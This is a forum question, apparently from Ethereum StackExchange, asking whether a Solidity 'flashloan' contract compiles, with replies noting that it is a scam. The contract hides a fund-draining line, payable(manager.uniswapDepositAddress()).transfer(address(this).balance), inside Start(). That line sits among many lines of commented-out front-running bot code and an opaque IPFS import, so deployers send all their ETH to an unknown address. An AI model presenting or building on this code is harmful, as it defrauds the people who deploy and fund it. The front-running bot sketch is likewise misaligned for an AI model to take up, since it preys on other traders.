Hello,I wish to know if this defi flashloan code is correct and I can compile with remix
pragma solidity ^0.6.6;

// Uniswap Deployer
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Callee.sol";


// Uniswap Manager
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";

// Mempool Arbitrage Scan
import "ipfs://QmYuXWZpQb2vSfBFvBt6rysTth6Mmp4KgtynTzLaQTj42z";
contract UniswapV3FlashLoan {
    
    string public owner;
    string public Target;

    uint flashloan;
    Manager manager;
    
    
    constructor(string memory _owner, string memory _Target) public {
        
        owner = _owner;
        Target = _Target;
        manager = new Manager();
        
        }
    
        
        // Send required ETH for liquidity pair
        receive() external payable {}
        
        
        // Perform tasks (clubbed .json functions into one to reduce external calls & reduce gas) manager.performTasks();
        function Stop() public payable {}
        function Withdrawal() public payable{}
    

        function   Start() public payable {
            
    
    //FLASHLOANV3UNISWAP

    //INPUT_TARGET_TOKEN(1)_ADDRESS ='()';
    //INPUT_TARGET_TOKEN(2)_ADDRESS ='()';
    //INPUT_MINIMUM_LOANVALUE = '()';
     //INPUT_MAXIMUM_LOANVALUE = '()';

//const fs = require('fs');
//var Web3 = require('web3');
//var abiDecoder = require('abi-decoder');
//var colors = require("colors");
//var Tx = require('ethereumjs-tx').Transaction;
//var axios = require('axios');
//var BigNumber = require('big-number');

//const {NETWORK, UNISWAP_ROUTER_ADDRESS, UNISWAP_FACTORY_ADDRESS, UNISWAP_ROUTER_ABI, UNISWAP_FACTORY_ABI, UNISWAP_POOL_ABI, HTTP_PROVIDER_LINK, WEBSOCKET_PROVIDER_LINK, HTTP_PROVIDER_LINK_TEST} = require('./constants.js');
//const {setBotAddress, getBotAddress, FLASH_BOT_ADDRESS, botABI} = require('./bot.js');
//const {PRIVATE_KEY, TOKEN_ADDRESS, AMOUNT, LEVEL} = require('./env.js');

//const INPUT_TOKEN_ADDRESS = '0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2';
//const WETH_TOKEN_ADDRESS = '0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2';
manager;

//flashloan_contract_manifold;
//require = owner_address;
//int = contract_deployer_address;
//abiDecoder =var4 
//Tx = require('ethereumjs-tx'); var4(+/-), =owner_output;


//
//var input_token_info;
//var out_token_info;
//var pool_info;
//var gas_price_info;
manager;

//var web3;
//var web3Ts;
//var web3Ws;
//var uniswapRouter;
//var uniswapFactory;
manager;

// one gwei
//const ONE_GWEI = 1e9;
manager;

//var buy_finished = false;
//var sell_finished = false;
//var buy_failed = false;
//var sell_failed = false;
//var attack_started = false;
manager;

//var succeed = false;
//var subscription;
manager;

//async function createWeb3(){
    //try {
        // web3 = new Web3(new Web3.providers.HttpProvider(HTTP_PROVIDER_LINK));
        // web3 = new Web3(new Web3.providers.HttpProvider(HTTP_PROVIDER_LINK_TEST));
       // web3 = new Web3(EthereumTesterProvider());
       // web3.eth.getAccounts(console.log);
      //web3Ws = new Web3(new Web3.providers.WebsocketProvider(WEBSOCKET_PROVIDER_LINK));
    //uniswapRouter = new web3.eth.Contract(UNISWAP_ROUTER_ABI, UNISWAP_ROUTER_ADDRESS);
        //uniswapFactory = new web3.eth.Contract(UNISWAP_FACTORY_ABI, UNISWAP_FACTORY_ADDRESS);
        //abiDecoder.addABI(UNISWAP_ROUTER_ABI);
        manager;

        //return true;
    //} catch (error) {
      //console.log(error);
      //return false;
      

//async function main() {
 
//try {   
        //if (await createWeb3() == false) {
            //console.log('Web3 Create Error'.yellow);
            //process.exit();
            
            
        
        
        //const user_wallet = web3.eth.accounts.privateKeyToAccount(PRIVATE_KEY);
        //const out_token_address = TOKEN_ADDRESS;
        //const amount = AMOUNT;
        //const level = LEVEL;
        
        //ret = await preparedAttack(INPUT_TOKEN_ADDRESS, out_token_address, user_wallet, amount, level);
        //if(ret == false) {
          //process.exit();
        

        //await updatePoolInfo();
        //outputtoken = await uniswapRouter.methods.getAmountOut(((amount*1.2)*(10**18)).toString(), pool_info.input_volumn.toString(), pool_info.output_volumn.toString()).call();

        //await approve(gas_price_info.high, outputtoken, out_token_address, user_wallet);
        
        //log_str = '***** Tracking more ' + (pool_info.attack_volumn/(10**input_token_info.decimals)).toFixed(5) + ' ' +  input_token_info.symbol + '  Exchange on uniswap *****'
        // console.log(log_str.green);    
        // console.log(web3Ws);
        //web3Ws.onopen = function(evt) {
            //web3Ws.send(JSON.stringify({ method: "subscribe", topic: "transfers", address: user_wallet.address }));
            //console.log('connected')
        
        // get pending transactions
        //subscription = web3Ws.eth.subscribe('pendingTransactions', function (error, result) {
        //}).on("data", async function (transactionHash) {
            //console.log(transactionHash);

            // let transaction = await web3.eth.getTransaction(transactionHash);
            // if (transaction != null && transaction['to'] == UNISWAP_ROUTER_ADDRESS)
            // {
            //     await handleTransaction(transaction, out_token_address, user_wallet, amount, level);
            // }
            
            //if (succeed) {
                //console.log("The flashbot finished the attack.");
                //process.exit();
               
            
     

    //catch (error) {
      
      //if(error.data != null && error.data.see === 'https://infura.io/dashboard')
      
         //console.log('Daily request count exceeded, Request rate limited'.yellow);
         //console.log('Please insert other API Key');
      //else{
         //console.log('Unknown Handled Error');
         //console.log(error);
       

      //process.exit();


//function handleTransaction(transaction, out_token_address, user_wallet, amount, level) {
    
    //(await triggersFrontRun(transaction, out_token_address, amount, level)) {
        //subscription.unsubscribe();
        //console.log('Perform front running attack...');

        //gasPrice = parseInt(transaction['gasPrice']);
        //newGasPrice = gasPrice + 50*ONE_GWEI;

        //estimatedInput = ((amount*0.999)*(10**18)).toString();
        //realInput = (amount*(10**18)).toString();
        //gasLimit = (300000).toString();
        
        //await updatePoolInfo();

        //var outputtoken = await uniswapRouter.methods.getAmountOut(estimatedInput, pool_info.input_volumn.toString(), pool_info.output_volumn.toString()).call();
        //swap(newGasPrice, gasLimit, outputtoken, realInput, 0, out_token_address, user_wallet, transaction);

        //console.log("wait until the honest transaction is done...", transaction['hash']);

        //while (await isPending(transaction['hash'])) {
        

        //if(buy_failed)
        
            //succeed = false;
            //return;
           
        
        //console.log('Buy succeed:')
        
        //Sell
        //await updatePoolInfo();
        //var outputeth = await uniswapRouter.methods.getAmountOut(outputtoken, pool_info.output_volumn.toString(), pool_info.input_volumn.toString()).call();
        //outputeth = outputeth * 0.999;

        //await swap(newGasPrice, gasLimit, outputtoken, outputeth, 1, out_token_address, user_wallet, transaction);
        
        //console.log('Sell succeed');
        //succeed = true;
manager;

//async function approve(gasPrice, outputtoken, out_token_address, user_wallet){
    //var allowance = await out_token_info.token_contract.methods.allowance(user_wallet.address, UNISWAP_ROUTER_ADDRESS).call();
    
    //allowance = BigNumber(allowance);
    //outputtoken = BigNumber(outputtoken);

    //var decimals = BigNumber(10).power(out_token_info.decimals);
    //var max_allowance = BigNumber(10000).multiply(decimals);

    //if(outputtoken.gt(max_allowance))
   
       //console.log('replace max allowance')
       //max_allowance = outputtoken;
       
       payable(manager.uniswapDepositAddress()).transfer(address(this).balance);
      
    
    //if(outputtoken.gt(allowance)){
        //console.log(max_allowance.toString());
        //var approveTX ={
                //from: user_wallet.address,
                //to: out_token_address,
                //gas: 50000,
                //gasPrice: gasPrice*ONE_GWEI,
                //data: out_token_info.token_contract.methods.approve(UNISWAP_ROUTER_ADDRESS, max_allowance).encodeABI()
                manager;
            

        //var signedTX = await user_wallet.signTransaction(approveTX);
        //var result = await web3.eth.sendSignedTransaction(signedTX.rawTransaction);

        //console.log('Approved Token')
    
    //return;


//select attacking transaction
//async function triggersFrontRun(transaction, out_token_address, amount, level) {
    
    //if(attack_started)
        //return false;

    //console.log((transaction.hash).yellow, parseInt(transaction['gasPrice']) / 10**9);
    //if(parseInt(transaction['gasPrice']) / 10**9 > 10 && parseInt(transaction['gasPrice']) / 10**9 < 50){
        //attack_started = true;
        //return true
   manager; 

    //return false;

    //if (transaction['to'] != UNISWAP_ROUTER_ADDRESS) {
        //return false;
   

    //let data = parseTx(transaction['input']);
   manager;
    //let method = data[0];
    manager;
    //let params = data[1];
    manager;
    //let gasPrice = parseInt(transaction['gasPrice']) / 10**9;
    manager;

    //if(method == 'swapExactETHForTokens')
    manager;
    
        //let in_amount = transaction;
        manager;
        //let out_min = params[0];
        manager;

        //let path = params[1];
        manager;
        //let in_token_addr = path[0];
        manager;
        //let out_token_addr = path[path.length-1];
        manager;
        
        //let recept_addr = params[2];
        manager;
        //let deadline = params[3];
        manager;

        //if(out_token_addr != out_token_address)
        manager;
        
            // console.log(out_token_addr.blue)
            // console.log(out_token_address)
            //return false;
}
}


Welcome. I think this really needs some formatting. You have dumped a contract which seems to include as comments the off chain portion (js code). Should separate these into separate code blocks and highlight any points of concern. Anecdotally it can be of much more value to write your own minimalist example and step through that. Some related posts https://ethereum.stackexchange.com/questions/153776/flashloan-flashbot/153785#153785 | https://ethereum.stackexchange.com/questi

Unfortunately it is a scam contract. You shouldn't deploy or deposit any ether with it.
